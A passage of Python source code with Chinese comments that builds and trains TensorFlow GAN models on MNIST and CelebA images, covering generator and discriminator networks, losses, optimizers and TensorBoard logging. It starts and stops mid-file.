填充摘要数据\n feed_dict = {\n self.input: x,\n }\n\n return feed_dict, this_batch_length\n\n def summary_to_tensorboard(self, sess, feed_dict, steps, log):\n print('summary_to_tensorboard')\n # g_images, dloss, gloss = sess.run(self.loss, feed_dict=feed_dict)\n # # print('type:{}, shape:{} min:{},max:{}'.format(type(g_images), g_images.shape, np.min(g_images), np.max(g_images)))\n #\n # # 训练完一代数据后,运行摘要\n # log.log_scalar('dloss', value=dloss, step=steps)\n # log.log_scalar('gloss', value=gloss, step=steps)\n #\n # self.d_loss.append(dloss)\n # self.g_loss.append(gloss)\n #\n # log.log_histogram(tag='hist_dloss', values=self.d_loss, step=steps)\n # log.log_histogram(tag='hist_gloss', values=self.g_loss, step=steps)\n #\n # image = self.dataset.scaler_inverse(g_images[:9]).reshape(-1, *g_images.shape[1:])\n # # print('type:{}, shape:{} min:{}, max:{}'.format(type(image), image.shape, np.min(image), np.max(image)))\n # log.log_images_square('img', images=image, step=steps)\n\n def leaky_relu(self, x, alpha=0.2, name='leaky_relu'):\n return tf.maximum(x, alpha * x, name=name)\n\n def train(self, epochs=1, train_batchs=3, summary_steps=1):\n\n self.summary_steps = summary_steps\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # 准备 tensorboard 日志摘要\n log = tools.tf.DsTfLog(log_dir=self.log_dir, graph=sess.graph)\n\n steps = 0\n for e in range(epochs):\n print('——————第 {}/{} 代数据训练开始——————'.format(e+1, epochs))\n\n # 设置数据生成器,\n batch = self.get_batchs_generator(train_batchs=train_batchs)\n\n # 开始一代数据的训练\n for _ in tqdm.tqdm(range(self.dataset.batch_count)):\n\n steps += 1\n\n feed_dict, batch_length = self.get_feed_dict(batch=batch)\n\n # 运行训练,优化\n _, _ = sess.run(self.opt, feed_dict=feed_dict)\n\n # 运行结构跟踪\n self.fs.run_flow(feed=feed_dict)\n\n self._on_batch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n self._on_epoch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n\n # 训练结束,储存模型\n saver = tf.train.Saver()\n saver.save(sess=sess, save_path=self.ckpt_file)\n\n\nclass DsTfGan(object):\n\n def __init__(self, dataset, noise_size=100, learning_rate=0.0005, leak_alpha=.2, beta1=.5, smooth_alpha=.9):\n # 超参数\n self.hp_noise_size = noise_size\n self.hp_learning_rate =learning_rate\n self.hp_leak_relu_alpha = leak_alpha\n self.hp_beta1 = beta1\n self.hp_smooth_alpha = smooth_alpha\n self.hp_dropout = .2\n\n self.dataset = dataset\n\n self.class_name = str(type(self)).replace('>', '').replace(\"'\", '').split('.')[-1:][0]\n\n # 设定log目录\n self.datas_root = os.path.join(datas_path, self.class_name)\n self.log_dir = os.path.join(self.datas_root, 'log')\n self.ckpt_file = os.path.join(self.log_dir, 'model.ckpt')\n print('datas path :', self.datas_root)\n print('log path :', self.log_dir)\n print('checkpoint file path :', self.ckpt_file)\n\n tf.reset_default_graph()\n self.fs = tools.tf.FlowStep(run_count_max=1)\n\n self.model()\n\n def model_inputs(self,):\n # real_dim = (32, 32, 3)\n # (None, *real_dim) = (None, 32, 32, 3) 引用值\n # (None, real_dim) = (None, (32, 32, 3)) 引用对象\n # inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n input_real = tf.placeholder(tf.float32, (None, *self.dataset.input_shape), name='input_real')\n input_noise = tf.placeholder(tf.float32, (None, self.hp_noise_size), name='inputs_noises')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n self.fs.add_one_step('input_gan_real', input_real)\n self.fs.add_one_step('input_gan_noise', input_noise)\n\n return input_real, input_noise, learning_rate\n\n def get_batchs_generator(self, train_batchs):\n batch = self.dataset.get_generator(train_batchs=train_batchs)\n self.dataset.summary()\n\n return batch\n\n def get_feed_dict(self, batch):\n # 获取一批数据\n # 得到该批数据的长度\n x, y = next(batch)\n x = self.dataset.scaler_transform(data=x)\n this_batch_length = len(x)\n # print('x type:{}, shape:{}, min:{}, max:{}'.format(type(x), x.shape, np.min(x), np.max(x)))\n\n # 生成与批量数据长度一致的批量噪点\n batch_noise = np.random.uniform(-1, 1, size=(this_batch_length, self.hp_noise_size))\n\n # 填充摘要数据\n feed_dict = {\n self.ph_input_real: x,\n self.ph_input_noise: batch_noise,\n self.ph_learning_rate: self.hp_learning_rate\n }\n\n return feed_dict, this_batch_length\n\n def generator(self, z, out_channel_dim, is_train=True, alpha=0.01):\n \"\"\"\n Create the generator network\n :param z: Input z\n :param out_channel_dim: The number of channels in the output image\n :param is_train: Boolean if generator is being used for training\n :return: The tensor output of the generator\n \"\"\"\n\n # leaky_relu = lambda x: tf.maximum(alpha * x, x)\n with tf.variable_scope(\"generator\", reuse=not is_train):\n # x1 = tf.layers.dense(z, 7 * 7 * 512)\n # x1 = tf.reshape(x1, (-1, 7, 7, 512))\n\n x1 = tf.layers.dense(inputs=z, units=self.conv_last_height * self.conv_last_width * self.conv_last_chanel)\n x1 = tf.reshape(x1, (-1, self.conv_last_height, self.conv_last_width, self.conv_last_chanel))\n\n x1 = tf.layers.batch_normalization(x1, training=is_train)\n x1 = self.leaky_relu(x=x1, alpha=alpha)\n x1 = tf.layers.dropout(inputs=x1, rate=self.hp_dropout)\n last_conv = x1\n self.fs.add_one_step('generator_x1', x1)\n # 7*7*512\n\n x2 = tf.layers.conv2d_transpose(\n inputs=x1, filters=256, kernel_size=5, strides=1, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n x2 = tf.layers.batch_normalization(x2, training=is_train)\n x2 = self.leaky_relu(x=x2, alpha=alpha)\n x2 = tf.layers.dropout(inputs=x2, rate=self.hp_dropout)\n last_conv = x2\n self.fs.add_one_step('generator_x2', x2)\n\n # 7*7*256\n\n x3 = tf.layers.conv2d_transpose(\n inputs=x2, filters=128, kernel_size=5, strides=2, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n x3 = tf.layers.batch_normalization(x3, training=is_train)\n x3 = self.leaky_relu(x=x3, alpha=alpha)\n x3 = tf.layers.dropout(inputs=x3, rate=self.hp_dropout)\n last_conv = x3\n self.fs.add_one_step('generator_x3', x3)\n\n # 14*14*128\n\n x4 = tf.layers.conv2d_transpose(\n inputs=x3, filters=64, kernel_size=5, strides=2, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n x4 = tf.layers.batch_normalization(x4, training=is_train)\n x4 = self.leaky_relu(x=x4, alpha=alpha)\n x4 = tf.layers.dropout(inputs=x4, rate=self.hp_dropout)\n last_conv = x4\n self.fs.add_one_step('generator_x4', x4)\n\n\n # logits = tf.layers.conv2d_transpose(x4, out_channel_dim, 5, 2, 'SAME')\n logits = tf.layers.conv2d_transpose(\n inputs=last_conv, filters=out_channel_dim, kernel_size=5, strides=2, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n self.fs.add_one_step('generator_logits', logits)\n\n out = tf.tanh(logits)\n self.fs.add_one_step('generator_out', out)\n\n # 28*28*out_channel_dim\n return out\n\n def discriminator(self, images, reuse=False, alpha=0.01):\n \"\"\"\n Create the discriminator network\n :param image: Tensor of input image(s)\n :param reuse: Boolean if the weights should be reused\n :return: Tuple of (tensor output of the discriminator, tensor logits of the discriminator)\n \"\"\"\n #leaky_relu = lambda x: tf.maximum(alpha * x, x)\n\n def conv(inputs, filters, batch_norm=True):\n outputs = tf.layers.conv2d(\n inputs=inputs, filters=filters, kernel_size=5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n\n if batch_norm:\n outputs = tf.layers.batch_normalization(outputs, training=True)\n\n outputs = self.leaky_relu(x=outputs, alpha=alpha)\n outputs = tf.layers.dropout(inputs=outputs, rate=self.hp_dropout)\n return outputs\n\n with tf.variable_scope(\"discriminator\", reuse=reuse):\n # input 28*28*3\n print('images type:{}, shape:{}, min:{}, max:{}'.format(type(images), images.shape, np.min(images), np.max(images)))\n x1 = conv(inputs=images, filters=64, batch_norm=False) # 14*14*64\n self.fs.add_one_step('discriminator_conv1', x1)\n\n x2 = conv(inputs=x1, filters=128) # 7*7*128\n self.fs.add_one_step('discriminator_conv2', x2)\n\n x3 = conv(inputs=x2, filters=256) # 4*4*256\n self.fs.add_one_step('discriminator_conv3', x3)\n\n # 输出最后的形状给生成器,生成器才知道生成图片的大小。\n last_conv = x3\n self.conv_last_height = last_conv.shape[1].value\n self.conv_last_width = last_conv.shape[2].value\n self.conv_last_chanel = last_conv.shape[3].value\n\n flat = tf.reshape(\n tensor=x3, shape=(-1, self.conv_last_height * self.conv_last_width * self.conv_last_chanel)\n )\n # flat = tf.reshape(tensor=x3, shape=(-1, 4, 4, 256))\n self.fs.add_one_step('discriminator_reshape', flat)\n\n # flat = x3\n\n logits = tf.layers.dense(inputs=flat, units=1)\n self.fs.add_one_step('discriminator_logits', logits)\n\n out = tf.sigmoid(x=logits)\n self.fs.add_one_step('discriminator_out', out)\n\n return out, logits, last_conv\n\n def model_loss(self, input_real, input_z, out_channel_dim, alpha=0.9):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n\n # 训练鉴别器看真图, 得到真图的结构(宽,高,通道),结构就在last_conv里\n _, d_logits_real, last_conv = self.discriminator(input_real)\n\n # 用真图的结构,生成假图\n g_model = self.generator(input_z, out_channel_dim)\n\n # 用真图的权重来比较假图\n _, d_logits_fake, _ = self.discriminator(g_model, reuse=True)\n\n # 记住真图的loss,\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real, labels=tf.ones_like(d_logits_real) * alpha))\n\n # 记住假图的loss\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_logits_fake)))\n\n # 真图loss和假图loss合起来才是鉴别器的真正loss\n # 前后两次喂给鉴别器的图可能尺寸不一致,所以要分开来计算loss\n d_loss = d_loss_real + d_loss_fake\n\n # 生成器\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.ones_like(d_logits_fake)))\n\n return g_model, d_loss, g_loss\n\n def model_opt(self, d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n with tf.control_dependencies(update_ops):\n t_vars = tf.trainable_variables()\n\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n return d_train_opt, g_train_opt\n\n def model(self):\n\n # 输入\n self.ph_input_real, self.ph_input_noise, self.ph_learning_rate = self.model_inputs()\n\n # 损失\n g_imgs, d_loss, g_loss = self.model_loss(self.ph_input_real, self.ph_input_noise, self.dataset.input_shape[2])\n self.loss = [g_imgs, d_loss, g_loss]\n\n # 优化\n d_opt, g_opt = self.model_opt(\n d_loss=d_loss, g_loss=g_loss,\n learning_rate=self.ph_learning_rate, beta1=self.hp_beta1\n )\n self.train_opt = [d_opt, g_opt]\n\n def _on_batch_end(self, sess, feed_dict, e, steps, log):\n if steps % self.summary_steps == 0:\n self.summary_to_tensorboard(sess=sess, feed_dict=feed_dict, steps=steps, log=log)\n\n def _on_epoch_end(self, sess, feed_dict, e, steps, log):\n print('***第 {} 代数据训练结束***'.format(e + 1))\n self.summary_to_tensorboard(sess=sess, feed_dict=feed_dict, steps=steps, log=log)\n\n def train(self, epochs=1, train_batchs=3, summary_steps=1):\n\n self.summary_steps = summary_steps\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # 准备 tensorboard 日志摘要\n log = tools.tf.DsTfLog(log_dir=self.log_dir, graph=sess.graph)\n self.d_loss = []\n self.g_loss = []\n\n steps = 0\n for e in range(epochs):\n print('——————第 {}/{} 代数据训练开始——————'.format(e+1, epochs))\n\n # 设置数据生成器,\n batch = self.get_batchs_generator(train_batchs=train_batchs)\n\n # 开始一代数据的训练\n for _ in tqdm.tqdm(range(self.dataset.batch_count)):\n\n steps += 1\n\n # 获取数据\n feed_dict, batch_length = self.get_feed_dict(batch=batch)\n\n # 运行训练,优化\n sess.run(self.train_opt, feed_dict=feed_dict)\n\n # 运行结构跟踪\n # self.fs.run_flow(feed=feed_dict)\n\n self._on_batch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n self._on_epoch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n\n # 训练结束,储存模型\n saver = tf.train.Saver()\n saver.save(sess=sess, save_path=self.ckpt_file)\n\n def summary_to_tensorboard(self, sess, feed_dict, steps, log):\n print('_on_summary')\n g_images, dloss, gloss = sess.run(self.loss, feed_dict=feed_dict)\n # print('type:{}, shape:{} min:{},max:{}'.format(type(g_images), g_images.shape, np.min(g_images), np.max(g_images)))\n\n # 训练完一代数据后,运行摘要\n log.log_scalar('dloss', value=dloss, step=steps)\n log.log_scalar('gloss', value=gloss, step=steps)\n\n self.d_loss.append(dloss)\n self.g_loss.append(gloss)\n\n log.log_histogram(tag='hist_dloss', values=self.d_loss, step=steps)\n log.log_histogram(tag='hist_gloss', values=self.g_loss, step=steps)\n\n image = self.dataset.scaler_inverse(g_images[:9]).reshape(-1, *g_images.shape[1:])\n # print('type:{}, shape:{} min:{}, max:{}'.format(type(image), image.shape, np.min(image), np.max(image)))\n log.log_images_square('img', images=image, step=steps)\n\n def leaky_relu(self, x, alpha=0.2, name='leaky_relu'):\n return tf.maximum(x, alpha * x, name=name)\n\n\ndef tf_gan(epochs=3):\n\n # 设定log目录\n log_dir = os.path.join(datas_path, 'gan_mnist', 'log')\n\n # 加载数据\n from tensorflow.examples.tutorials.mnist import input_data\n mnist = input_data.read_data_sets(train_dir=MNIST_DIR)\n # return mnist\n\n # 初始化图\n tf.reset_default_graph()\n\n # 模型输入\n def model_inputs(real_dim, z_dim):\n # ???为什么shape是两维,但其中一维是None呢?难道输入的不是一张张宽高确定的图片吗?\n # 因为 mnist数据集每张图是28x28,被调整为784,高度和宽度被合并成一维。\n inputs_real = tf.placeholder(dtype=tf.float32, shape=[None, real_dim], name='input_real')\n inputs_z = tf.placeholder(dtype=tf.float32, shape=[None, z_dim], name='input_z')\n\n return inputs_real, inputs_z\n\n # 生成器\n def generator(z, out_dim, n_units=128, reuse=False, alpha=0.01):\n ''' Build the generator network.\n\n Arguments\n ---------\n z : Input tensor for the generator\n out_dim : Shape of the generator output\n n_units : Number of units in hidden layer\n reuse : Reuse the variables with tf.variable_scope\n alpha : leak parameter for leaky ReLU\n\n Returns\n -------\n out:\n '''\n with tf.variable_scope('generator', reuse=reuse): # finish this\n # Hidden layer\n # 隐藏层没有激活函数,只是一个线性输出。自行用 leaky relu 计算激活\n # 形状: inputs -> units\n h1 = tf.layers.dense(inputs=z, units=n_units, activation=None)\n # Leaky ReLU\n h1 = tf.maximum(alpha * h1, h1)\n\n # Logits and tanh output\n # tf.layers.dense 参数默认值: activation=None\n logits = tf.layers.dense(inputs=h1, units=out_dim, activation=None)\n out = tf.tanh(logits)\n\n tf.summary.histogram('leaky_relu', h1)\n tf.summary.histogram('out_tanh', out)\n\n return out\n\n # 鉴别器\n def discriminator(x, n_units=128, reuse=False, alpha=0.01):\n ''' Build the discriminator network.\n\n Arguments\n ---------\n x : Input tensor for the discriminator\n n_units: Number of units in hidden layer\n reuse : Reuse the variables with tf.variable_scope\n alpha : leak parameter for leaky ReLU\n\n Returns\n -------\n out, logits:\n '''\n with tf.variable_scope('discriminator', reuse=reuse): # finish this\n # Hidden layer\n h1 = tf.layers.dense(inputs=x, units=n_units, activation=None)\n # Leaky ReLU\n h1 = tf.maximum(alpha * h1, h1)\n\n # dense函数应该是可以直接指定激活的,但此处需要返回线性的logits和激活后的out所以就分开写了。\n logits = tf.layers.dense(inputs=h1, units=1, activation=None)\n out = tf.sigmoid(logits)\n\n if reuse is False:\n tf.summary.histogram('leaky_relu', h1)\n tf.summary.histogram('logits', logits)\n tf.summary.histogram('out_sigmoid', out)\n\n return out, logits\n\n\n def generator_sample():\n # 加载所有生成器有关的参数。\n saver = tf.train.Saver(var_list=g_vars)\n with tf.Session() as sess:\n # 加载最后的训练的权重值到图Session\n saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir=checkpoints_dir))\n\n # 生成16个样品噪点,得到16个假图。\n sample_z = np.random.uniform(-1, 1, size=(16, Z_NOISE_SIZE))\n gen_samples = sess.run(\n generator(input_z, input_size, n_units=G_HIDDEN_SIZE, reuse=True, alpha=LEAKY_RELU_ALPHA),\n feed_dict={input_z: sample_z}\n )\n view_samples(0, [gen_samples])\n\n\n # Create our input placeholders\n # input_size = 784, z_size = 100\n input_real, input_z = model_inputs(real_dim=input_size, z_dim=Z_NOISE_SIZE)\n\n # Generator network here\n # 用 100 个噪点, 通过 g_hidden_size 的dense网络,生成 input_size 的图像。\n g_model = generator(z=input_z, out_dim=input_size, n_units=G_HIDDEN_SIZE, alpha=LEAKY_RELU_ALPHA)\n\n # Disriminator network here\n # 用真图训练鉴别器。\n _, d_logits_real = discriminator(x=input_real, n_units=D_HIDDEN_SIZE, alpha=LEAKY_RELU_ALPHA)\n # return _, d_logits_real\n\n # 鉴别器的权重参数是经过真图训练的,\n # 如果把假图塞入鉴别器,把标注置1,硬说是真图。\n # 那么鉴别器的loss就能反映这个假图到底有多真了。\n _, d_logits_fake = discriminator(x=g_model, reuse=True, n_units=D_HIDDEN_SIZE, alpha=LEAKY_RELU_ALPHA)\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n logits=d_logits_fake, labels=tf.ones_like(d_logits_fake)\n )\n )\n\n # # Calculate losses\n # 标签平滑化。真图的标注全部都是0.9, 鉴别器的参数调整就向着0.9进行。\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n logits=d_logits_real, labels=tf.ones_like(d_logits_real) * (1 - smooth)\n )\n )\n\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n logits=d_logits_fake, labels=tf.zeros_like(d_logits_real)\n # logits=d_logits_fake, labels=tf.zeros_like(d_logits_fake)\n )\n )\n\n # 鉴别器的损失,就是真损失和假损失之和。\n # 因为流程上把数据分开了两类塞进鉴别器。\n # 首先塞一批真图,去训练鉴别器的权重参数\n # 然后再塞一批假图,用真图的权重参数来结算,得到的loss用来调整假图生成器。\n # 鉴别器的真实水平是由两方面判断的:\n # 1,真图看成假图, 2.假图看成真图。\n # 所以要将两部分的loss相加。\n # keras有跟好的方法,就是同时塞真假数据进去,就不用这么尴尬了。\n\n d_loss = d_loss_real + d_loss_fake\n\n # Get the trainable_variables, split into G and D parts\n t_vars = tf.trainable_variables()\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n\n d_train_opt = tf.train.AdamOptimizer(LEARNING_RATE).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(LEARNING_RATE).minimize(g_loss, var_list=g_vars)\n\n\n # summary 是独立运行的一个op\n tf.summary.scalar('g_loss', g_loss)\n tf.summary.scalar('d_loss', d_loss)\n # max_outputs:为其生成图像的批次元素的最大数量。\n # 塞给summary.images的是一批张量,所以要指定这批张量中要输出多少张图片。\n # 只在一批里输出一张图\n tf.summary.image(\n name='g_model',\n max_outputs=1,\n tensor=tf.reshape(g_model, [-1, 28, 28, 1])\n )\n\n # train\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n merged = tf.summary.merge_all() # 将图形、训练过程等数据合并在一起\n log = tools.tf.DsTfLog(log_dir=log_dir, graph=sess.graph)\n\n for e in tqdm.tqdm(range(epochs)):\n\n print('训练数据遍历 {}/{} 代'.format(e+1, epochs))\n\n for ii in range(mnist.train.num_examples // BATCH_SIZE):\n batch = mnist.train.next_batch(BATCH_SIZE)\n\n # Get images, reshape and rescale to pass to D\n # batch 是一个tuple, (img, label),\n # 其中,img.shape:(128,784), lable.shape:(128,)\n batch_images = batch[0].reshape((BATCH_SIZE, 784))\n\n # 图像进行值缩放。\n batch_images = batch_images * 2 - 1\n\n # Sample random noise for G\n # 生成噪点\n batch_z = np.random.uniform(-1, 1, size=(BATCH_SIZE, Z_NOISE_SIZE))\n\n fd ={input_real: batch_images, input_z: batch_z}\n\n # d_train_opt 是优化器,优化器运行之后是不会有返回值的。\n _ = sess.run(d_train_opt, feed_dict=fd)\n _ = sess.run(g_train_opt, feed_dict={input_z: batch_z})\n\n # At the end of each epoch, get the losses and print them out\n # 在训练完一代数据之后, 运行一次摘要。\n # 摘要 m 是所有要输出到tensorboard的数据,一大坨的byte,无法直观显示。\n m = sess.run(\n merged,\n feed_dict={input_z: batch_z, input_real: batch_images}\n )\n log.writer.add_summary(m, e)\n\n # print(\n # #\"Epoch {}/{}...\".format(e + 1, epochs),\n # \"Discriminator Loss: {:.4f}...\".format(dloss),\n # # \"Generator Loss: {:.4f}\".format(train_loss_g)\n # )\n\n # Sample from generator as we're training for viewing afterwards\n # sample_z = np.random.uniform(-1, 1, size=(16, z_size))\n # gen_samples = sess.run(\n # generator(input_z, input_size, n_units=g_hidden_size, reuse=True, alpha=alpha),\n # feed_dict={input_z: sample_z}\n # )\n #samples.append(gen_samples)\n\n saver = tf.train.Saver(var_list=g_vars)\n saver.save(sess, log_dir)\n\n # # Save training generator samples\n # with open(sample_path, 'wb') as f:\n # pkl.dump(samples, f)\n #\n # generator_sample()\n\n print('运行 tensorboard 命令:')\n print('python -m tensorflow.tensorboard --host=localhost --logdir=%s' % log_dir)\n\n return mnist\n\n\ndef get_image(image_path, width, height, mode):\n \"\"\"\n Read image from image_path\n :param image_path: Path of image\n :param width: Width of image\n :param height: Height of image\n :param mode: Mode of image\n :return: Image data\n \"\"\"\n image = pil.Image.open(image_path)\n\n if image.size != (width, height): # HACK - Check if image is from the CELEBA dataset\n # Remove most pixels that aren't part of a face\n # celeba 的图像大小,高218,宽178,通道3\n # image.size = (178,218)\n face_width = face_height = 108\n j = (image.size[0] - face_width) // 2\n i = (image.size[1] - face_height) // 2\n # 裁剪图像,crop(起始坐标x,起始坐标y,宽,高) 以左上角为起始。\n image = image.crop([j, i, j + face_width, i + face_height])\n image = image.resize([width, height], pil.Image.BILINEAR)\n\n return np.array(image.convert(mode))\n\n\ndef tf_celeba():\n\n # 设定log目录\n log_dir = os.path.join(datas_path, 'gan_celeba', 'log')\n\n def model_inputs(image_width, image_height, image_channels, z_dim):\n \"\"\"\n Create the model inputs\n :param image_width: The input image width\n :param image_height: The input image height\n :param image_channels: The number of image channels\n :param z_dim: The dimension of Z\n :return: Tuple of (tensor of real input images, tensor of z data, learning rate)\n \"\"\"\n input_real = tf.placeholder(tf.float32, [None, image_width, image_height, image_channels], \"input_real\")\n input_z = tf.placeholder(tf.float32, [None, z_dim], \"input_z\")\n learning_rate = tf.placeholder(tf.float32, None, \"learning_rate\")\n\n return input_real, input_z, learning_rate\n\n def LeakyReLU(x, alpha=0.2):\n return tf.maximum(alpha * x, x)\n\n def discriminator(images, reuse=False, alpha=0.01):\n \"\"\"\n Create the discriminator network\n :param image: Tensor of input image(s)\n :param reuse: Boolean if the weights should be reused\n :return: Tuple of (tensor output of the discriminator, tensor logits of the discriminator)\n \"\"\"\n leaky_relu = lambda x: tf.maximum(alpha * x, x)\n\n def conv(inputs, filters, batch_norm=True):\n outputs = tf.layers.conv2d(inputs, filters, 5, 2, 'same')\n if batch_norm:\n outputs = tf.layers.batch_normalization(outputs, training=True)\n return leaky_relu(outputs)\n\n with tf.variable_scope(\"discriminator\", reuse=reuse):\n # input 28*28*3\n x1 = conv(images, 64, batch_norm=False) # 14*14*64\n x2 = conv(x1, 128) # 7*7*128\n x3 = conv(x2, 256) # 4*4*256\n\n flat = tf.reshape(x3, (-1, 4 * 4 * 256))\n logits = tf.layers.dense(flat, 1)\n out = tf.sigmoid(logits)\n\n return out, logits\n\n def generator(z, out_channel_dim, is_train=True, alpha=0.01):\n \"\"\"\n Create the generator network\n :param z: Input z\n :param out_channel_dim: The number of channels in the output image\n :param is_train: Boolean if generator is being used for training\n :return: The tensor output of the generator\n \"\"\"\n leaky_relu = lambda x: tf.maximum(alpha * x, x)\n with tf.variable_scope(\"generator\", reuse=not is_train):\n x1 = tf.layers.dense(z, 7 * 7 * 512)\n x1 = tf.reshape(x1, (-1, 7, 7, 512))\n x1 = tf.layers.batch_normalization(x1, training=is_train)\n x1 = leaky_relu(x1)\n # 7*7*512\n\n x2 = tf.layers.conv2d_transpose(x1, 256, 5, 1, 'SAME')\n x2 = tf.layers.batch_normalization(x2, training=is_train)\n x2 = leaky_relu(x2)\n # 7*7*256\n\n x3 = tf.layers.conv2d_transpose(x2, 128, 5, 2, 'SAME')\n x3 = tf.layers.batch_normalization(x3, training=is_train)\n x3 = leaky_relu(x3)\n # 14*14*128\n\n logits = tf.layers.conv2d_transpose(x3, out_channel_dim, 5, 2, 'SAME')\n out = tf.tanh(logits)\n # 28*28*out_channel_dim\n return out\n\n def model_loss(input_real, input_z, out_channel_dim, alpha=0.9):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n g_model = generator(input_z, out_channel_dim)\n d_model_real, d_logits_real = discriminator(input_real)\n d_model_fake, d_logits_fake = discriminator(g_model, reuse=True)\n\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real, labels=tf.ones_like(d_logits_real) * alpha))\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_logits_fake)))\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.ones_like(d_logits_fake)))\n\n d_loss = d_loss_real + d_loss_fake\n\n return d_loss, g_loss\n\n def model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n with tf.control_dependencies(update_ops):\n t_vars = tf.trainable_variables()\n\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n return d_train_opt, g_train_opt\n\n def show_generator_output(sess, n_images, input_z, out_channel_dim, image_mode):\n \"\"\"\n Show example output for the generator\n :param sess: TensorFlow session\n :param n_images: Number of Images to display\n :param input_z: Input Z Tensor\n :param out_channel_dim: The number of channels in the output image\n :param image_mode: The mode to use for images (\"RGB\" or \"L\")\n \"\"\"\n cmap = None if image_mode == 'RGB' else 'gray'\n z_dim = input_z.get_shape().as_list()[-1]\n example_z = np.random.uniform(-1, 1, size=[n_images, z_dim])\n\n samples = sess.run(\n generator(input_z, out_channel_dim, False),\n feed_dict={input_z: example_z})\n\n images_grid = images_square_grid(samples, image_mode)\n plt.imshow(images_grid, cmap=cmap)\n # pyplot.show()\n\n def images_square_grid(images, mode):\n \"\"\"\n Save images as a square grid\n :param images: Images to be used for the grid\n :param mode: The mode to use for images\n :return: Image of images in a square grid\n \"\"\"\n # Get maximum size for square grid of images\n save_size = int(np.floor(np.sqrt(images.shape[0])))\n\n # Scale to 0-255\n images = (((images - images.min()) * 255) / (images.max() - images.min())).astype(np.uint8)\n\n # Put images in a square arrangement\n images_in_square = np.reshape(\n images[:save_size * save_size],\n (save_size, save_size, images.shape[1], images.shape[2], images.shape[3]))\n if mode == 'L':\n images_in_square = np.squeeze(images_in_square, 4)\n\n # Combine images to grid image\n new_im = pil.Image.new(mode, (images.shape[1] * save_size, images.shape[2] * save_size))\n for col_i, col_images in enumerate(images_in_square):\n for image_i, image in enumerate(col_images):\n im = pil.Image.fromarray(image, mode)\n new_im.paste(im, (col_i * images.shape[1], image_i * images.shape[2]))\n\n return new_im\n\n def train(epoch_count, batch_size, z_dim, learning_rate, beta1, get_batches, data_shape, data_image_mode):\n \"\"\"\n Train the GAN\n :param epoch_count: Number of epochs\n :param batch_size: Batch Size\n :param z_dim: Z dimension\n :param learning_rate: Learning Rate\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :param get_batches: Function to get batches\n :param data_shape: Shape of the data\n :param data_image_mode: The image mode to use for images (\"RGB\" or \"L\")\n \"\"\"\n input_real, input_z, lr = model_inputs(data_shape[1], data_shape[2], data_shape[3], z_dim)\n\n d_loss, g_loss = model_loss(input_real, input_z, data_shape[3])\n\n d_opt, g_opt = 